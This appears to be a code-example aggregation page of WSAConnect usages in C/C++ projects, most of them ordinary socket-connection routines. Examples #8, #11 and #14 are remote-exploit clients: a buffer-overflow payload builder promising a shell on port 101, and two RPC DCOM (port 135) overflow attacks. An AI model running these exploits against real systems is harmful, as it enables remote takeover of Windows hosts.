Пример #1
0
/* No signal delivery during connect. */
int
pgwin32_connect(SOCKET s, const struct sockaddr * addr, int addrlen)
{
	int			r;

	r = WSAConnect(s, addr, addrlen, NULL, NULL, NULL, NULL);
	if (r == 0)
		return 0;

	if (WSAGetLastError() != WSAEWOULDBLOCK)
	{
		TranslateSocketError();
		return -1;
	}

	while (pgwin32_waitforsinglesocket(s, FD_CONNECT) == 0)
	{
		/* Loop endlessly as long as we are just delivering signals */
	}

	return 0;
}
Пример #2
0
/*connect host:port*/
SOCKET Conecta(char *Host, short puerto)
{
	/*struct for make the socket*/
	WSADATA wsaData;
	SOCKET Winsock;//listener socket
	/*two structures for connect*/
	struct sockaddr_in Winsock_In;
	struct hostent *Ip;

	/*start the socket*/
	WSAStartup(MAKEWORD(2,2), &wsaData);
	/*make*/
	Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

	//check socket status
	if(Winsock==INVALID_SOCKET)
	{
		/*exit*/
		WSACleanup();
		return -1;
	}

	/*complete the struct*/
	Ip=gethostbyname(Host);
	Winsock_In.sin_port=htons(puerto);
	Winsock_In.sin_family=AF_INET;
	Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));

	/*connect*/
	if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
	{
		/*end*/
		WSACleanup();
		return -1;
	}

	return Winsock;
}
Пример #3
0
int WEventSocket::Connect(const char *host,unsigned short int port)
{
	HOSTENT *hostent=NULL;
	hostent=gethostbyname(host);

	// Check for error
	if(hostent==NULL)
	{
		Close();
		return SOCKET_ERROR;
	}

	sockaddr_in addr;
	memset(&addr,0,sizeof(sockaddr_in));
	addr.sin_family=AF_INET;
	addr.sin_addr.S_un.S_addr=*((unsigned long *)hostent->h_addr_list[0]);
	addr.sin_port=htons(port);

	// Connect the socket to the listening server socket
	int ret=WSAConnect(m_hSocket,(sockaddr *)&addr,sizeof(sockaddr_in),NULL,NULL,NULL,NULL);

	return ret;
}
Пример #4
0
BOOL CTcpSocket::Connect(LPCSTR pszTargetIP,USHORT nTargetPort)
{
	BOOL bIsIP = FALSE;
	sockaddr_in *psi = NULL;
	unsigned long ulIP = inet_addr(pszTargetIP);
	if( INADDR_NONE == ulIP )
	{
		hostent *pHostEnt = gethostbyname(pszTargetIP);
		if(pHostEnt && (pHostEnt->h_addrtype == AF_INET || pHostEnt->h_addrtype == AF_INET6))
		{
			psi = (sockaddr_in *)pHostEnt->h_addr;
		}
	}
	else
	{
		bIsIP = TRUE;
	}


	sockaddr_in si;

	if (bIsIP)
	{
		si.sin_addr.s_addr = inet_addr(pszTargetIP);
	}
	else
	{
		si.sin_addr.s_addr = psi->sin_addr.s_addr;
	}
	

	si.sin_port = htons(nTargetPort);
	si.sin_family = AF_INET;
	int bRes = WSAConnect(m_TcpSock,(sockaddr *)&si,sizeof(si),NULL,NULL,NULL,NULL);
	return bRes == 0;
}
Пример #5
0
// Connect this CConnection object to a remote computer on the Internet
// Takes pAddress, a Windows Sockets structure that holds an IP address, and takes the port number seprately
// Returns true if connected
BOOL CConnection::ConnectTo(const IN_ADDR* pAddress, WORD nPort)
{
	// Make sure the socket isn't already connected somehow
	if ( IsValid() )
		return FALSE;

	// Make sure we have an address and a nonzero port number
	if ( pAddress == NULL || nPort == 0 )
		return FALSE;

	// S_un.S_addr is the IP as a single unsigned 4-byte long
	if ( pAddress->S_un.S_addr == 0 )
		return FALSE;

	// The IP address is in the security list of government and corporate addresses we want to avoid
	if ( Security.IsDenied( pAddress ) )
	{
		// Report that we aren't connecting to this IP address and return false
		theApp.Message( MSG_ERROR, IDS_NETWORK_SECURITY_OUTGOING, (LPCTSTR)CString( inet_ntoa( *pAddress ) ) );
		return FALSE;
	}

	// The IN_ADDR structure we just got passed isn't the same as the one already stored in this object
	if ( pAddress != &m_pHost.sin_addr )
	{
		// Zero the memory of the entire SOCKADDR_IN structure m_pHost, and then copy in the sin_addr part
		ZeroMemory( &m_pHost, sizeof( m_pHost ) );
		m_pHost.sin_addr = *pAddress;
	}

	// Fill in more parts of the m_pHost structure
	m_pHost.sin_family	= AF_INET;							// PF_INET means just normal IPv4, not IPv6 yet
	m_pHost.sin_port	= htons( nPort );					// Copy the port number into the m_pHost structure
	m_sAddress			= inet_ntoa( m_pHost.sin_addr );	// Save the IP address as a string of text
	UpdateCountry();

	// Create a socket and store it in m_hSocket
	// Normal IPv4 not IPv6, and the two-way sequenced reliable byte streams of TCP, not the datagrams of UDP
	m_hSocket = socket( PF_INET, SOCK_STREAM, IPPROTO_TCP );

	// Choose asynchronous, non-blocking reading and writing on our new socket
	DWORD dwValue = 1;
	ioctlsocket( m_hSocket, FIONBIO, &dwValue );
		// Call Windows Sockets ioctlsocket to control the input/output mode of our new socket
		// Give it our new socket
		// Select the option for blocking i/o, should the program wait on read and write calls, or keep going?
		// Nonzero, it should keep going

	// If the OutHost string in connection settings has an IP address written in it
	if ( Settings.Connection.OutHost.GetLength() )
	{
		// Read the text and copy the IP address and port into a new local MFC SOCKADDR_IN structure called pOutgoing
		SOCKADDR_IN pOutgoing;
		Network.Resolve( Settings.Connection.OutHost, 0, &pOutgoing );

		// S_addr is the IP address as a single long number, if it's not zero
		if ( pOutgoing.sin_addr.S_un.S_addr )
		{
			// Call bind in Windows Sockets to associate the local address with the socket
			bind(
				m_hSocket,					// Our socket
				(SOCKADDR*)&pOutgoing,		// The IP address this computer appears to have on the Internet (do)
				sizeof( SOCKADDR_IN ) );	// Tell bind how many bytes it can read at the pointer
		}
	}

	DestroyBuffers();

	// Try to connect to the remote computer
	if ( WSAConnect(
		m_hSocket,					// Our socket
		(SOCKADDR*)&m_pHost,		// The remote IP address and port number
		sizeof( SOCKADDR_IN ),		// How many bytes the function can read
		NULL, NULL, NULL, NULL ) )	// No advanced features
	{
		// If no error occurs, WSAConnect returns 0, so if we're here an error happened
		int nError = WSAGetLastError();		// Get the last Windows Sockets error number

		// An error of "would block" is normal because connections can't be made instantly and this is a non-blocking socket
		if ( nError != WSAEWOULDBLOCK )
		{
			CNetwork::CloseSocket( m_hSocket, true );

			if ( nError != 0 )
				Statistics.Current.Connections.Errors++;

			return FALSE;
		}
	}

	CreateBuffers();

	// Record that we initiated this connection, and when it happened
	m_bInitiated	= TRUE;
	m_tConnected	= GetTickCount();

	// Record one more outgoing connection in the statistics
	Statistics.Current.Connections.Outgoing++;

	// Connection successfully attempted
	return TRUE;
}
Пример #6
0
  void EventTCPSocket::connect( const wstring& host,
  const wstring& service, Protocol protocol )
  {
    if ( mState != State_Closed )
      EXCEPT( L"Cannot connect, socket is not closed" );

    mState = State_Connecting;

    ADDRINFOW resolve;
    PADDRINFOW address = NULL;
    PADDRINFOW resolved = NULL;

    memset( &resolve, NULL, sizeof( ADDRINFOW ) );

    resolve.ai_family   = util::protocolToFamily( protocol );
    resolve.ai_socktype = SOCK_STREAM;
    resolve.ai_protocol = IPPROTO_TCP;

    if ( GetAddrInfoW( host.c_str(), service.c_str(), &resolve, &resolved ) )
    {
      mState = State_Closed;
      EXCEPT_WSA( L"Couldn't resolve" );
    }

    for ( address = resolved; address != nullptr; address = address->ai_next )
    {
      if ( address->ai_socktype != SOCK_STREAM || address->ai_protocol != IPPROTO_TCP )
        continue;

      mSocket = WSASocketW( address->ai_family, address->ai_socktype,
        address->ai_protocol, nullptr, 0,
        mOverlapped ? WSA_FLAG_OVERLAPPED : 0 );

      if ( mSocket == INVALID_SOCKET )
        continue;

      if ( !WSAConnect( mSocket, address->ai_addr, (int)address->ai_addrlen,
        nullptr, nullptr, nullptr, nullptr ) )
        break;

      closesocket( mSocket );
    }

    if ( address == nullptr )
    {
      mState = State_Closed;
      EXCEPT_WSA( L"Couldn't connect" );
    }

    mBound = true;
    
    mConnectionInfo.update( mSocket, false );
    mConnectionInfo.update( mSocket, true );

    if ( WSAEventSelect( mSocket, mNetworkEvent, FD_READ | FD_CLOSE ) == SOCKET_ERROR )
      EXCEPT_WSA( L"Couldn't select socket events" );

    mState = State_Connected;

    for ( SocketListener* listener : mListeners )
      if ( listener->connectCallback( this ) )
        break;
  }
Пример #7
0
//----------------------------------------------------------------------
// connect
//----------------------------------------------------------------------
bool SocketConnection::connect()
{
    ConnectionDescriptionPtr description = _getDescription();
    LBASSERT( description->type == CONNECTIONTYPE_TCPIP );
    if( !isClosed( ))
        return false;

    if( description->port == 0 )
        return false;

    if( description->getHostname().empty( ))
        description->setHostname( "127.0.0.1" );

    sockaddr_in address;
    if( !_parseAddress( description, address ))
    {
        LBWARN << "Can't parse connection parameters" << std::endl;
        return false;
    }

    _setState( STATE_CONNECTING );

    if( !_createSocket( ))
        return false;

    if( address.sin_addr.s_addr == 0 )
    {
        LBWARN << "Refuse to connect to 0.0.0.0" << std::endl;
        close();
        return false;
    }

#ifdef _WIN32
    const bool connected = WSAConnect( _readFD, (sockaddr*)&address,
                                       sizeof( address ), 0, 0, 0, 0 ) == 0;
#else
    int nTries = 10;
    while( nTries-- )
    {
        const bool connected = (::connect( _readFD, (sockaddr*)&address,
                                           sizeof( address )) == 0);
        if( connected )
            break;

        switch( errno )
        {
          case EINTR: // Happens sometimes, but looks harmless
              LBDEBUG << "connect: " << lunchbox::sysError << ", retrying"
                     << std::endl;
              lunchbox::sleep( 5 /*ms*/ );
              break;

          default:
              nTries = 0;
              break;
        }
    }
    const bool connected = nTries > 0;
#endif

    if( !connected )
    {
        LBDEBUG << "Could not connect to '" << description->getHostname() << ":"
                << description->port << "': " << lunchbox::sysError << std::endl;
        close();
        return false;
    }

    _initAIORead();
    _setState( STATE_CONNECTED );
    LBDEBUG << "Connected " << description->toString() << std::endl;
    return true;
}
Пример #8
0
int main(int argc,char *argv[])
{
 ver();
 if ((argc<2)||(argc>3)){usage(argv[0]);return -1;}
 if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
 int ip=htonl(inet_addr(argv[1])), sz, port, sizev, sizew, sizex, sizey, sizez, v, w, x, y, z;
 if (argc=3){port=atoi(argv[2]);}
 else port=2000;
 SOCKET s;
 struct fd_set mask;
 struct timeval timeout;
 struct sockaddr_in server;
 s=socket(AF_INET,SOCK_STREAM,0);

 if (s=INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
 server.sin_family=AF_INET;
 server.sin_addr.s_addr=htonl(ip);
 server.sin_port=htons(port);
 WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
 timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
 switch(select(s+1,NULL,&mask,NULL,&timeout))
 {
  case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
  case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
  default:
   if(FD_ISSET(s,&mask))
   {
    cout<<"[+] connected, constructing the payload..."<<endl;
    Sleep(1000);
    sizev=5;
    sizew=88;
    sizey=800-sizeof(scode);
    sizex=5;
    sizez=20;
    sz=sizev+sizew+sizex+sizez+sizeof(scode)+sizey;
    memset(payload,0,sizeof(payload));
    strcat(payload,"");
    for (v=0;v<sizev;v++){strcat(payload,"\x61");}
    strcat(payload,"\x66\x8b\xf3");
    strcat(payload,"\x66\x83\xc6\x09");
    strcat(payload,"\xff\xe6");
    for (w=0;w<sizew;w++){strcat(payload,"\x61");}
    strcat(payload,"\xeb");
    strcat(payload,"\x9d\x61\x61");
    strcat(payload,jmpebxw2k);
    for (x=0;x<sizex;x++){strcat(payload,"\x90");}
    strcat(payload,scode);
    for (y=0;y<sizey;y++){strcat(payload,"\x61");}
    for (z=0;z<sizez;z++){strcat(payload,"~");}

    if (send(s,payload,strlen(payload),0)=SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
    cout<<"[+] size of payload: "<<sz<<endl;
    cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
    return 0;
   }

 }

 closesocket(s);
 WSACleanup();
 return 0;
}
Пример #9
0
/*-------------------------------------------------------------------------------------------------------------------------------------
	
	FUNCTION:		Client

	INTERFACE:		DWORD WINAPI Client(LPVOID commInfo)

	RETURNS:		DWORD

	NOTES:			Client will set up a socket depending on TCP or UDP. Once a socket is created, the host server information
					is saved into a structure. If a file is specified, the file is written to the server instead of junk 
					data. If TCP is specified, the socket will wait until all data is sent before free'ing resources.

--------------------------------------------------------------------------------------------------------------------------------------*/
DWORD WINAPI Client(LPVOID commInfo)
{
	NetworkInfo*		netInfo = (NetworkInfo*)commInfo;
	DWORD				ret;
	int					data_size = BUFFERLENGTH;
	SOCKET				sd = 0;
	struct				sockaddr_in server;
	struct				hostent	*hp;
	SYSTEMTIME			stStartTime, stEndTime;
	WSADATA				stWSAData;
	WORD				wVersionRequested = MAKEWORD(2, 2);
	int					numOfPackets, sizeOfPackets, protocol;

	LPSOCKET_INFORMATION SI;

	//Remove session if one exists already
	WSACleanup();

	if (netInfo == NULL)
	{
		formatMessage("Saving communication information failed");
		ExitThread(1);
	}

	formatMessage("Starting Client");

	char* host = netInfo->ipAddress;
	char* port = netInfo->port;
	numOfPackets = netInfo->numberOfPackets;
	sizeOfPackets = netInfo->sizeOfPackets;
	protocol = netInfo->protocol;

	char* sbuf;
	char* controlBuf = new char[BUFFERLENGTH];
	char* EOFBuf = new char[BUFFERLENGTH];

	//Sending file is specified
	if (sendFile == true)
	{
		if ((clientFP = fopen("WarandPeace.txt", "r+b")) == NULL)
		{
			formatMessage("Opening file failed");
			return 1;
		}

		fseek(clientFP, 0L, SEEK_END);
		int newNumOfPackets = (ftell(clientFP) /sizeOfPackets);
		fseek(clientFP, 0L, SEEK_SET);
		if (newNumOfPackets <= 0)
		{
			formatMessage("Reading file size failed");
			ExitThread(1);
		}
		numOfPackets = newNumOfPackets;
		netInfo->numberOfPackets = newNumOfPackets;
	}
	if ((ret = WSAStartup(wVersionRequested, &stWSAData)) != 0)
	{
		formatMessage("WSAStartup failed");
		ExitThread(1);
	}
	//TCP Socket
	if (protocol == 1)
	{
		if ((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
		{
			formatMessage("Cannot create TCP socket");
			ExitThread(1);
		}
	}
	//UDP Socket
	else if(protocol == 2)
	{
		if ((sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
		{
			formatMessage("Cannot create UDP socket");
			ExitThread(1);
		}
	}

	// Initialize and set up the address structure
	memset((char *)&server, 0, sizeof(struct sockaddr_in));
	server.sin_family = AF_INET;
	server.sin_port = htons(atoi(port));
	if ((hp = gethostbyname(host)) == NULL)
	{
		formatMessage("Unknown server address");
		ExitThread(1);
	}
	// Copy the server address
	memcpy((char *)&server.sin_addr, hp->h_addr, hp->h_length);

	//TCP Connect
	if (protocol == 1)
	{
		// Connecting to the server
		if (WSAConnect(sd, (struct sockaddr *)&server, sizeof(server), 0, 0, 0, NULL) == -1)
		{
			formatMessage("Can't connect to server");
			ExitThread(1);
		}
	}

	//Creating Socket Info struct
	if ((SI = (LPSOCKET_INFORMATION)GlobalAlloc(GPTR, sizeof(SOCKET_INFORMATION))) == NULL)
	{
		formatMessage("GlobalAlloc() failed with error");
		ExitThread(1);
	}

	//Copy socket
	SI->Socket = sd;

	//Send control data
	formatControlBuffer(controlBuf, numOfPackets, sizeOfPackets);
	formatEOTBuffer(EOFBuf);

	if (sendFile == true)
	{
		//TCP send
		if (protocol == 1)
		{
			sendControlTCP(SI, controlBuf, strlen(controlBuf));
			sendfileDataTCP(SI, sizeOfPackets);
			sendControlTCP(SI, EOFBuf, strlen(EOFBuf));
			SleepEx(INFINITE, TRUE);
		}
		//UDP send
		else
		{
			sendControlUDP(SI, server, controlBuf, strlen(controlBuf));
			sendfileDataUDP(SI, server, sizeOfPackets);
			sendControlUDP(SI, server, EOFBuf, strlen(EOFBuf));
		}
		fclose(clientFP);
	}
	else
	{
		sbuf = new char[sizeOfPackets];
		// data	is a, b, c, ..., z, a, b,...
		for (int i = 0; i < sizeOfPackets; i++)
		{
			sbuf[i] = 'z';
		}
		//TCP send
		if (protocol == 1)
		{
			sendControlTCP(SI, controlBuf, strlen(controlBuf));
			sendDataTCP(SI, sbuf, sizeOfPackets, numOfPackets);
			sendControlTCP(SI, EOFBuf, strlen(EOFBuf));
			SleepEx(INFINITE, TRUE);
		}
		//UDP send
		else
		{
			sendControlUDP(SI, server, controlBuf, sizeOfPackets);
			sendDataUDP(SI, server, sbuf, sizeOfPackets, numOfPackets);
			sendControlUDP(SI, server, EOFBuf, strlen(EOFBuf));
		}
		delete[](sbuf);
	}
	formatMessage("Terminating Client");
	//Remove resources
	delete[](EOFBuf);
	delete[](controlBuf);
	delete(commInfo);
	closesocket(sd);
	closesocket(SI->Socket);
	GlobalFree(SI);
	ExitThread(0);
}
Пример #10
0
//----------------------------------------------------------------------
// listen
//----------------------------------------------------------------------
bool PGMConnection::listen()
{
    EQASSERT( _description->type == CONNECTIONTYPE_PGM );

    if( _state != STATE_CLOSED )
        return false;

    _state = STATE_CONNECTING;
    _fireStateChanged();

    sockaddr_in address;
    const size_t size = sizeof( sockaddr_in ); 

    if( !_parseAddress( address ))
    {
        EQWARN << "Can't parse connection parameters" << std::endl;
        return false;
    }

    //-- create a 'listening' read socket
    _readFD = _initSocket( address );
    
    if( _readFD == INVALID_SOCKET || !_setupReadSocket( ))
    {
        close();
        return false;
    }

    const bool listening = (::listen( _readFD, 10 ) == 0);
        
    if( !listening )
    {
        EQWARN << "Could not listen on socket: " << base::sysError 
               << std::endl;
        close();
        return false;
    }

    // get listening socket parameters
    socklen_t used = size;
    getsockname( _readFD, (struct sockaddr *)&address, &used ); 

    _description->port = ntohs( address.sin_port );

    const std::string& hostname = _description->getHostname();
    if( hostname.empty( ))
    {
        if( address.sin_addr.s_addr == INADDR_ANY )
        {
            char cHostname[256];
            gethostname( cHostname, 256 );
            _description->setHostname( cHostname );
        }
        else
            _description->setHostname( inet_ntoa( address.sin_addr ));
    }
    
    _initAIOAccept();

    
    //-- create a connected 'write' socket
    address.sin_family      = AF_INET;
    address.sin_addr.s_addr = htonl( INADDR_ANY );
    address.sin_port        = htons( 0 );
    memset( &(address.sin_zero), 0, 8 ); // zero the rest

    _writeFD = _initSocket( address );

    if( _writeFD == INVALID_SOCKET || !_setupSendSocket( ))
    {
        close();
        return false;
    }

    _parseAddress( address );
    
#ifdef _WIN32
    const bool connected = WSAConnect( _writeFD, (sockaddr*)&address, 
                                       size, 0, 0, 0, 0 ) == 0;
#else
    const bool connected = (::connect( _readFD, (sockaddr*)&address, 
                                       size ) == 0);
#endif

    if( !connected )
    {
        EQWARN << "Could not connect to '" << _description->getHostname() << ":"
               << _description->port << "': " << base::sysError 
               << std::endl;
        close();
        return false;
    }

    _state = STATE_LISTENING;
    _fireStateChanged();

    EQINFO << "Listening on " << _description->getHostname() << "["
           << inet_ntoa( address.sin_addr ) << "]:" << _description->port
           << " (" << _description->toString() << ")" << std::endl;
    
    return true;
}
Пример #11
0
void main(int argc,char ** argv)
{
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];

    printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
    printf("Code by FlashSky,Flashsky xfocus org\n");
    printf("Welcome to our Site: http://www.xfocus.org\n");
    printf("Welcome to our Site: http://www.venustech.com.cn\n");
    if(argc!=2)
    {
        printf("%s targetIP \n",argv[0]);
        printf("for cn w2k server sp3/sp4+ms03-26\n");
    }
    
    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
    
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    len1=sizeof(request1);
    len=sizeof(sccnsp3sp4);

    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
    memcpy(buf2,request1,sizeof(request1));
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sccnsp3sp4)/2;  
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sccnsp3sp4)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sccnsp3sp4,sizeof(sccnsp3sp4));
    len1=len1+sizeof(sccnsp3sp4);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;  
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
    
    len=recv(sock,buf1,1000,NULL);
    if (send(sock,buf2,len1,0)==SOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
//    len=recv(sock,buf1,1024,NULL);
}
Пример #12
0
void AsynchronousClientClass::Init(const HWND& hwnd)
{
	// Server IP 입력과 DB Login 을 하는 팝업 Dialog
	DialogBox(g_hInst, MAKEINTRESOURCE(IDD_DIALOG1), hwnd, AboutDlgProc);
	//inputServerIP();

	// init Winsock
	int number_error = WSAStartup(MAKEWORD(2, 2), &m_wsadata);
	if (number_error != 0) {
		int err_no = WSAGetLastError();
		error_quit(L"WSAStartup ERROR", err_no);
	}

	m_sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
	if (INVALID_SOCKET == m_sock) {
		int err_no = WSAGetLastError();
		error_quit(L"WSASocket()", err_no);
	}

	// connect
	SOCKADDR_IN serveraddr;
	ZeroMemory(&serveraddr, sizeof(serveraddr));
	serveraddr.sin_family = AF_INET;
	serveraddr.sin_addr.s_addr = inet_addr(m_serverIP);
	serveraddr.sin_port = htons(SERVERPORT);

	m_retval = WSAConnect(m_sock, (SOCKADDR *)&serveraddr, sizeof(serveraddr), NULL, NULL, NULL, NULL);
	if (SOCKET_ERROR == m_retval) {
		// 비동기 소켓이라 그냥 리턴, 검사 해주어야 함
		if (WSAGetLastError() != WSAEWOULDBLOCK) {
			int err_no = WSAGetLastError();
			error_quit(L"WSAConnect()", err_no);
		}
	}

	// DB 연동하기 위한 함수
	Login_access();
	printf("\nLogin SUCCESSED\n");

	// WSAAsyncSelect - 넌블로킹 소켓 자동 전환
	m_hWnd = hwnd;

	if (NULL == m_hWnd) {
#ifdef _DEBUG
		printf("Cannot find Consol Window, ERROR : %d\n", __LINE__);
#endif
		exit(-1);
	}
	m_retval = WSAAsyncSelect(m_sock, m_hWnd, WM_SOCKET, FD_READ | FD_CLOSE);
	if (SOCKET_ERROR == m_retval) {
		int err_no = WSAGetLastError();
		error_quit(L"ioctlsocket()", err_no);
	}

	m_wsa_recvbuf.buf = reinterpret_cast<CHAR*>(m_recvbuf);
	m_wsa_recvbuf.len = MAX_BUF_SIZE;
	m_wsa_sendbuf.buf = reinterpret_cast<CHAR*>(m_sendbuf);
	m_wsa_sendbuf.len = MAX_BUF_SIZE;

	LuaScript script("script/AI_default_status.lua");

	MAX_AI_SLIME = script.get<int>("ai_status_slime2.howMany");
	MAX_AI_GOBLIN = script.get<int>("ai_status_goblin2.howMany");
	MAX_AI_BOSS = script.get<int>("ai_status_boss.howMany");
	MAX_AI_NUM = MAX_AI_BOSS;

#ifdef _DEBUG
	//system("cls");
	printf("Connected with SERVER\n");
#endif
}
Пример #13
0
//----------------------------------------------------------------
//  CImpIRestrictedProcess::RP_WSPConnect()
//
//----------------------------------------------------------------
STDMETHODIMP
CImpIRestrictedProcess::RP_WSPConnect(
                                 IN  RPC_SOCKADDR_IN *pInAddr,
                                 IN  long        lAddrLen,
                                 IN  RPC_WSABUF *pCallerData,
                                 OUT RPC_WSABUF *pCalleeData,
                                 IN  RPC_QOS    *pSQOS,
                                 IN  RPC_QOS    *pGQOS,
                                 IN  DWORD       dwTargetPid,
                                 OUT DWORD      *pTargetSocket,
                                 OUT long       *pError )
    {
    int       iRet;
    HRESULT   hr;
    BOOL      fInherit;
    DWORD     dwSourcePid;
    DWORD     dwAccess;
    DWORD     dwOptions;
    NTSTATUS  NtStatus;
    HANDLE    hSourceProcess;
    HANDLE    hSourceHandle;
    HANDLE    hTargetProcess;

    *pError = NO_ERROR;

    dwSourcePid = GetCurrentProcessId();
    if (!dwSourcePid)
       {
       *pError = GetLastError();
       return NOERROR;
       }


    if (m_Socket == INVALID_SOCKET)
       {
       *pError = WSAEACCES;
       closesocket(m_Socket);
       m_Socket = INVALID_SOCKET;
       return NOERROR;
       }

    //
    // Check to make sure the restricted client is connecting only
    // to a server that we allow.
    //
    hr = IsValidAddr( (char*)&(pInAddr->sin_addr), sizeof(ULONG) );
    #ifdef DBG_ALWAYS_RESTRICTED
    DbgPrint("RP_WSPConnect(): IsValidAdder(): %s\n",
             (hr == S_OK)? "TRUE" : "FALSE" );
    hr = S_OK;
    #endif
    if (S_OK != hr)
       {
       *pError = WSAEACCES;
       closesocket(m_Socket);
       m_Socket = INVALID_SOCKET;
       return NOERROR;
       }

    // Ok, do the connect() on behalf of the restricted client
    iRet = WSAConnect( m_Socket,
                       (struct sockaddr *)pInAddr,
                       lAddrLen,
                       (WSABUF*)pCallerData,
                       (WSABUF*)pCalleeData,
                       (QOS*)pSQOS,
                       (QOS*)pGQOS );

    if (iRet == SOCKET_ERROR)
       {
       *pError = WSAGetLastError();
       closesocket(m_Socket);
       m_Socket = INVALID_SOCKET;
       return NOERROR;
       }

    // Get a handle to our own process (to be used by DuplicateHandle()).
    hSourceProcess = OpenProcess( PROCESS_DUP_HANDLE, TRUE, dwSourcePid );
    if (!hSourceProcess)
       {
       *pError = GetLastError();
       closesocket(m_Socket);
       m_Socket = INVALID_SOCKET;
       return NOERROR;
       }

    // Get a handle to the restricted process
    hTargetProcess = OpenProcess( PROCESS_DUP_HANDLE, TRUE, dwTargetPid );
    if (!hTargetProcess)
       {
       *pError = GetLastError();
       closesocket(m_Socket);
       m_Socket = INVALID_SOCKET;
       CloseHandle(hSourceProcess);
       return NOERROR;
       }

    // Ok, duplicate the socket into the restricted client.
    dwAccess = 0;
    fInherit = FALSE;
    dwOptions = DUPLICATE_SAME_ACCESS;
    if (!DuplicateHandle(hSourceProcess,
                         (HANDLE)m_Socket,
                         hTargetProcess,
                         (HANDLE*)pTargetSocket,
                         dwAccess,
                         fInherit,
                         dwOptions ))
       {
       *pError = GetLastError();
       }

    // No longer need a local copy of the open socket.
    closesocket(m_Socket);
    m_Socket = INVALID_SOCKET;

    // Done with the process handles.
    CloseHandle(hSourceProcess);
    CloseHandle(hTargetProcess);

    return NOERROR;
    }
Пример #14
0
int attack(char *ip1,bool atack)
{
    unsigned char rawData[1036];
    memcpy(rawData,rawData1,1036);
    unsigned char shellcode[50000];
    char ip[200];
    strcpy(ip,ip1);
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[50000];
    unsigned char buf2[50000];

    printf("%s\n",ip);
    //printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
    //printf("Code by FlashSky,Flashsky xfocus org\n");
    //printf("Welcome to our Site: http://www.xfocus.org\n");
    //printf("Welcome to our Site: http://www.venustech.com.cn\n");
    /*    if(argc!=3)
        {
              printf("%s targetIP targetOS\ntargets:\n",argv[0]);
              for(int i=0;i<sizeof(target_os)/sizeof(v);i++)
                   printf("%d - %s\n",i,target_os.target);
                   printf("\n%x\n",GETSTRCS(argv[1]));
              return;
        }
    */
    /*    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
        {
            printf("WSAStartup error.Error:%d\n",WSAGetLastError());
            return;
        }
    */
    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(ip);

    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return 0;
    }
    len1=sizeof(request1);

    len=sizeof(rawData);

    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("%s - connect failed\n",ip);
        return 0;
    }

    int vers=!version(ip,sock);

//     printf("%d\n",vers);
//     return;
//     int vers=1;

    FILE *fp;

    //чит ем п кет
